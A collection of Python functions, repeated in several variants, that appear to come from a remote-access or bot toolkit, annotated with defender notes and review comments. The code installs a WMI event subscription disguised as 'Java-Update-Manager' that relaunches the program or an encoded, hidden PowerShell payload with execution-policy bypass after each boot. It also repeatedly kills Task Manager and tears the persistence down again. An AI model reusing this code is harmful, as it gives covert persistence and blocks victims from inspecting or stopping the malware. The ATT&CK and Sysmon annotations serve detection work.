def _add_powershell_wmi(command=None, name='Java-Update-Manager'):
    """Install a WMI permanent event subscription that relaunches this program (or *command*) after boot.

    Only acts on Windows (``os.name == 'nt'``) and only while the
    ``powershell_wmi`` method is not already marked as established.  The
    launch string is ``start /b /min <sys.argv[0]>`` when ``sys.argv[0]``
    is an existing file; otherwise, if *command* is given, a
    ``powershell.exe`` invocation carrying *command* as an encoded
    argument.  That string is spliced into a ``wmi.ps1`` template obtained
    through ``util.remote_import`` (template content is not visible here)
    and executed through ``util.powershell``.

    :param command: optional payload, used only when ``sys.argv[0]`` is
        not a file on disk
    :param str name: label given to the WMI filter, queried back afterwards
        to confirm installation (default: Java-Update-Manager)
    :returns: ``(True, query_output)`` when an ``__EventFilter`` named
        *name* is found afterwards, otherwise ``(False, None)``

    Defender note: ``__EventFilter`` / ``CommandLineEventConsumer`` /
    ``__FilterToConsumerBinding`` objects in ``root\\subscription`` are the
    classic WMI persistence pattern (ATT&CK T1546.003); Sysmon event IDs
    19/20/21 record their creation.
    """
    try:
        # `methods` is a module-level registry not visible on this page — presumably
        # one entry per persistence method with an `established` flag.
        if os.name == 'nt' and not methods['powershell_wmi'].established:
            cmd_line = ""
            # Prefer relaunching the running script itself, in the background and minimized.
            value = sys.argv[0]
            if value and os.path.isfile(value):
                cmd_line = 'start /b /min {}'.format(value)
            elif command:
                # powershell.exe by absolute path: execution-policy bypass, hidden window,
                # non-interactive, no profile, payload passed via -encoded (base64 of UTF-16LE).
                # NOTE(review): bytes(command).encode(...) only works where bytes is str,
                # i.e. this appears to target Python 2 (func_name below is also Python 2 only).
                cmd_line = r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -exec bypass -window hidden -noni -nop -encoded {}'.format(base64.b64encode(bytes(command).encode('UTF-16LE')))
            if cmd_line:
                # WQL trigger fragment: matches Win32_PerfFormattedData_PerfOS_System while
                # SystemUpTime is in [240, 325) seconds — a short window a few minutes after boot.
                startup = "'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"
                # Plain placeholder replacement into the fetched template; no escaping of `name`.
                powershell = util.remote_import('wmi.ps1').replace('[STARTUP]', startup).replace('[COMMAND_LINE]', cmd_line).replace('[NAME]', name)
                util.powershell(powershell)
                # Confirm installation by querying root\subscription for the filter by name.
                code = "Get-WmiObject __eventFilter -namespace root\\subscription -filter \"name='%s'\"" % name
                result = util.powershell(code)
                if name in result:
                    return (True, result)
    except Exception as e:
        # Any failure (including NameError/TypeError from the lines above) is logged, not raised.
        util.debug('{} error: {}'.format(_add_powershell_wmi.func_name, str(e)))
    # NOTE(review): the nesting of this fall-through return is reconstructed from a
    # collapsed single-line listing; every non-success path is read as ending here.
    return (False, None)
def _add_powershell_wmi(command=None, name='Java-Update-Manager'):
    """Install a WMI permanent event subscription that runs *command* shortly after boot.

    Variant that fills a module-level ``string.Template``-style
    ``template_wmi`` (its content is not visible here) instead of a fetched
    ``wmi.ps1``.  Only acts on Windows, only while the ``powershell_wmi``
    method is not yet marked as established, and only when *command* is
    truthy.  The resulting script is executed through ``util.powershell``
    and the filter is queried back by name to confirm installation.

    :param command: payload to run via ``powershell.exe -encoded``
    :param str name: label given to the WMI filter (default:
        Java-Update-Manager)
    :returns: ``(True, query_output)`` when an ``__EventFilter`` named
        *name* is found afterwards, otherwise ``(False, None)``

    Defender note: ``__EventFilter`` / ``CommandLineEventConsumer`` /
    ``__FilterToConsumerBinding`` objects in ``root\\subscription`` are the
    classic WMI persistence pattern (ATT&CK T1546.003); Sysmon event IDs
    19/20/21 record their creation.
    """
    try:
        global template_wmi
        # `_methods` is a module-level registry not visible on this page.
        if os.name == 'nt' and not _methods['powershell_wmi'].established:
            # NOTE(review): the extent of this `if command:` body is reconstructed from a
            # collapsed single-line listing; `cmd_line` is only bound inside it.
            if command:
                # powershell.exe by absolute path: execution-policy bypass, hidden window,
                # non-interactive, no profile, payload passed via -encoded (base64 of UTF-16LE).
                # NOTE(review): bytes(command).encode(...) only works where bytes is str (Python 2).
                cmd_line = r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -exec bypass -window hidden -noni -nop -encoded {}'.format(base64.b64encode(bytes(command).encode('UTF-16LE')))
                # WQL trigger fragment: matches Win32_PerfFormattedData_PerfOS_System while
                # SystemUpTime is in [240, 325) seconds — a short window a few minutes after boot.
                startup = "'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"
                # Template substitution; `name` is inserted without escaping.
                script = template_wmi.substitute(STARTUP=startup, COMMAND_LINE=cmd_line, NAME=name)
                _ = util.powershell(script)
                # Confirm installation by querying root\subscription for the filter by name.
                code = "Get-WmiObject __eventFilter -namespace root\\subscription -filter \"name='%s'\"" % name
                result = util.powershell(code)
                if name in result:
                    return (True, result)
    except Exception as e:
        # Failures are logged, never raised to the caller.
        util.log('{} error: {}'.format(_add_powershell_wmi.__name__, str(e)))
    return (False, None)
def _add_powershell_wmi(command=None, name='Java-Update-Manager'):
    """Install a WMI permanent event subscription that runs *command* shortly after boot.

    Same logic as the ``template_wmi`` variant above; the only difference
    is the error log line, which uses ``func_name`` (the Python 2
    spelling of ``__name__``).  Only acts on Windows, only while the
    ``powershell_wmi`` method is not yet marked as established, and only
    when *command* is truthy.

    :param command: payload to run via ``powershell.exe -encoded``
    :param str name: label given to the WMI filter (default:
        Java-Update-Manager)
    :returns: ``(True, query_output)`` when an ``__EventFilter`` named
        *name* is found afterwards, otherwise ``(False, None)``

    Defender note: ``__EventFilter`` / ``CommandLineEventConsumer`` /
    ``__FilterToConsumerBinding`` objects in ``root\\subscription`` are the
    classic WMI persistence pattern (ATT&CK T1546.003); Sysmon event IDs
    19/20/21 record their creation.
    """
    try:
        global template_wmi
        # `_methods` is a module-level registry not visible on this page.
        if os.name == 'nt' and not _methods['powershell_wmi'].established:
            # NOTE(review): the extent of this `if command:` body is reconstructed from a
            # collapsed single-line listing; `cmd_line` is only bound inside it.
            if command:
                # powershell.exe by absolute path: execution-policy bypass, hidden window,
                # non-interactive, no profile, payload passed via -encoded (base64 of UTF-16LE).
                # NOTE(review): bytes(command).encode(...) only works where bytes is str (Python 2).
                cmd_line = r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -exec bypass -window hidden -noni -nop -encoded {}'.format(base64.b64encode(bytes(command).encode('UTF-16LE')))
                # WQL trigger fragment: matches Win32_PerfFormattedData_PerfOS_System while
                # SystemUpTime is in [240, 325) seconds — a short window a few minutes after boot.
                startup = "'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"
                # Template substitution; `name` is inserted without escaping.
                script = template_wmi.substitute(STARTUP=startup, COMMAND_LINE=cmd_line, NAME=name)
                _ = util.powershell(script)
                # Confirm installation by querying root\subscription for the filter by name.
                code = "Get-WmiObject __eventFilter -namespace root\\subscription -filter \"name='%s'\"" % name
                result = util.powershell(code)
                if name in result:
                    return (True, result)
    except Exception as e:
        # Failures are logged, never raised. `func_name` does not exist on Python 3
        # functions, so on that runtime the handler itself would raise AttributeError.
        util.log('{} error: {}'.format(_add_powershell_wmi.func_name, str(e)))
    return (False, None)
def block(process_name='taskmgr.exe'):
    """
    Block a process from running by immediately killing it every time it spawns

    `Optional`
    :param str process_name:   process name to block (default: taskmgr.exe)

    :returns: confirmation string ``"Process <name> blocked"`` on success;
        ``None`` (implicitly) when ``util.powershell`` raises, after the
        error has been logged

    The mechanism lives in the module-level ``template_block`` PowerShell
    template, which is not visible on this page; *process_name* is
    substituted into it without escaping.

    Defender note: the default target is Task Manager, so a repeating
    loop of ``taskmgr.exe`` terminations right after launch is the
    observable side effect of this function.
    """
    global template_block
    try:
        code = template_block.substitute(PROCESS=process_name)
        _ = util.powershell(code)
        return "Process {} blocked".format(process_name)
    except Exception as e:
        # Logged and swallowed; `func_name` is the Python 2 spelling of __name__.
        util.log("{} error: {}".format(block.func_name, str(e)))
def block(process_name='taskmgr.exe'):
    """
    Block a process from running by immediately killing it every time it spawns

    `Optional`
    :param str process_name:   process name to block (default: taskmgr.exe)

    :returns: confirmation string ``"Process <name> blocked"`` on success;
        ``None`` (implicitly) when ``util.powershell`` raises, after the
        error has been logged

    The mechanism lives in the module-level ``template_block`` PowerShell
    template, which is not visible on this page; *process_name* is
    substituted into it without escaping.

    Defender note: the default target is Task Manager, so a repeating
    loop of ``taskmgr.exe`` terminations right after launch is the
    observable side effect of this function.
    """
    global template_block
    try:
        code = template_block.substitute(PROCESS=process_name)
        _ = util.powershell(code)
        return "Process {} blocked".format(process_name)
    except Exception as e:
        # Logged and swallowed; this variant uses the Python 3 __name__ attribute.
        util.log("{} error: {}".format(block.__name__, str(e)))
def _remove_powershell_wmi(value=None, name='Java-Update-Manager'):
    """Attempt to tear down the WMI event subscription installed under *name*.

    Runs, through ``util.powershell``, three queries against
    ``root\\subscription`` that are intended to remove the
    ``__EventFilter`` and ``CommandLineEventConsumer`` named *name* and
    any ``__FilterToConsumerBinding`` whose filter matches *name*.  Only
    runs when the ``powershell_wmi`` method is marked as established.

    :param value: unused
    :param str name: label of the subscription to remove (default:
        Java-Update-Manager)
    :returns: ``(False, None)`` when the removal script produced no
        output; otherwise the registry's current
        ``(established, result)`` pair — this function does not itself
        update that state

    Defender note: deletion of these three object classes from
    ``root\\subscription`` is as observable as their creation (Sysmon
    event IDs 19/20/21 cover WMI filter/consumer/binding activity).
    """
    try:
        # `_methods` is a module-level registry not visible on this page.
        if _methods['powershell_wmi'].established:
            try:
                # NOTE(review): the separators between the Get-WmiObject and Remove-WmiObject
                # calls appear as commas in this listing; treat the exact script text as
                # reproduced rather than verified.
                code = r""" Get-WmiObject __eventFilter -namespace root\subscription -filter "name='[NAME]'", Remove-WmiObject Get-WmiObject CommandLineEventConsumer -Namespace root\subscription -filter "name='[NAME]'" , Remove-WmiObject Get-WmiObject __FilterToConsumerBinding -Namespace root\subscription , Where-Object { $_.filter -match '[NAME]'} , Remove-WmiObject""".replace('[NAME]', name)
                result = util.powershell(code)
                if not result:
                    return (False, None)
            except:
                # Bare except: any failure of the removal script is silently ignored.
                pass
            return (_methods['powershell_wmi'].established, _methods['powershell_wmi'].result)
    except Exception as e:
        # NOTE(review): the log line names _add_powershell_wmi, not this function — a
        # copy/paste label; errors from here are attributed to the wrong routine.
        util.log('{} error: {}'.format(_add_powershell_wmi.__name__, str(e)))
    return (_methods['powershell_wmi'].established, _methods['powershell_wmi'].result)
def _remove_powershell_wmi(value=None, name='Java-Update-Manager'):
    """Attempt to tear down the WMI event subscription installed under *name*.

    Identical to the variant above except that the error log line uses
    ``func_name`` (the Python 2 spelling of ``__name__``).  Runs three
    queries against ``root\\subscription`` intended to remove the
    ``__EventFilter`` and ``CommandLineEventConsumer`` named *name* and
    any ``__FilterToConsumerBinding`` whose filter matches *name*.  Only
    runs when the ``powershell_wmi`` method is marked as established.

    :param value: unused
    :param str name: label of the subscription to remove (default:
        Java-Update-Manager)
    :returns: ``(False, None)`` when the removal script produced no
        output; otherwise the registry's current
        ``(established, result)`` pair — this function does not itself
        update that state

    Defender note: deletion of these three object classes from
    ``root\\subscription`` is as observable as their creation (Sysmon
    event IDs 19/20/21 cover WMI filter/consumer/binding activity).
    """
    try:
        # `_methods` is a module-level registry not visible on this page.
        if _methods['powershell_wmi'].established:
            try:
                # NOTE(review): the separators between the Get-WmiObject and Remove-WmiObject
                # calls appear as commas in this listing; treat the exact script text as
                # reproduced rather than verified.
                code = r""" Get-WmiObject __eventFilter -namespace root\subscription -filter "name='[NAME]'", Remove-WmiObject Get-WmiObject CommandLineEventConsumer -Namespace root\subscription -filter "name='[NAME]'" , Remove-WmiObject Get-WmiObject __FilterToConsumerBinding -Namespace root\subscription , Where-Object { $_.filter -match '[NAME]'} , Remove-WmiObject""".replace('[NAME]', name)
                result = util.powershell(code)
                if not result:
                    return (False, None)
            except:
                # Bare except: any failure of the removal script is silently ignored.
                pass
            return (_methods['powershell_wmi'].established, _methods['powershell_wmi'].result)
    except Exception as e:
        # NOTE(review): the log line names _add_powershell_wmi, not this function — a
        # copy/paste label. `func_name` also does not exist on Python 3 functions.
        util.log('{} error: {}'.format(_add_powershell_wmi.func_name, str(e)))
    return (_methods['powershell_wmi'].established, _methods['powershell_wmi'].result)
def remove_powershell_wmi(task_name='Java-Update-Manager'):
    """Attempt to tear down the WMI event subscription installed under *task_name*.

    Older variant: the method registry is a plain dict (``methods[...]``
    with ``.get('established')`` and ``['result']``) rather than an
    object with attributes, and the PowerShell script is a non-raw string.
    Runs three queries against ``root\\subscription`` intended to remove
    the ``__EventFilter`` and ``CommandLineEventConsumer`` named
    *task_name* and any ``__FilterToConsumerBinding`` whose filter
    matches it.  Only runs when ``methods['powershell_wmi']`` reports
    ``established``.

    :param str task_name: label of the subscription to remove (default:
        Java-Update-Manager)
    :returns: ``(False, None)`` when the removal script produced no
        output; otherwise the registry's current
        ``(established, result)`` pair — this function does not itself
        update that state

    Defender note: deletion of these three object classes from
    ``root\\subscription`` is as observable as their creation (Sysmon
    event IDs 19/20/21 cover WMI filter/consumer/binding activity).
    """
    try:
        # `methods` is a module-level registry not visible on this page.
        if methods['powershell_wmi'].get('established'):
            try:
                # Non-raw string: `\s` in root\subscription is an unrecognised escape and is
                # kept verbatim by Python (with a warning on newer 3.x).
                # NOTE(review): the separators between the Get-WmiObject and Remove-WmiObject
                # calls appear as commas in this listing; treat the exact script text as
                # reproduced rather than verified.
                code = """ Get-WmiObject __eventFilter -namespace root\subscription -filter "name='[NAME]'", Remove-WmiObject Get-WmiObject CommandLineEventConsumer -Namespace root\subscription -filter "name='[NAME]'" , Remove-WmiObject Get-WmiObject __FilterToConsumerBinding -Namespace root\subscription , Where-Object { $_.filter -match '[NAME]'} , Remove-WmiObject""".replace('[NAME]', task_name)
                result = util.powershell(code)
                if not result:
                    return (False, None)
            except:
                # Bare except: any failure of the removal script is silently ignored.
                pass
            return (methods['powershell_wmi']['established'], methods['powershell_wmi']['result'])
    except Exception as e:
        # NOTE(review): the log line refers to `add_powershell_wmi`, a name not defined on
        # this page; if it is unbound at runtime the handler itself raises NameError.
        util.debug('{} error: {}'.format(add_powershell_wmi.func_name, str(e)))
    return (methods['powershell_wmi']['established'], methods['powershell_wmi']['result'])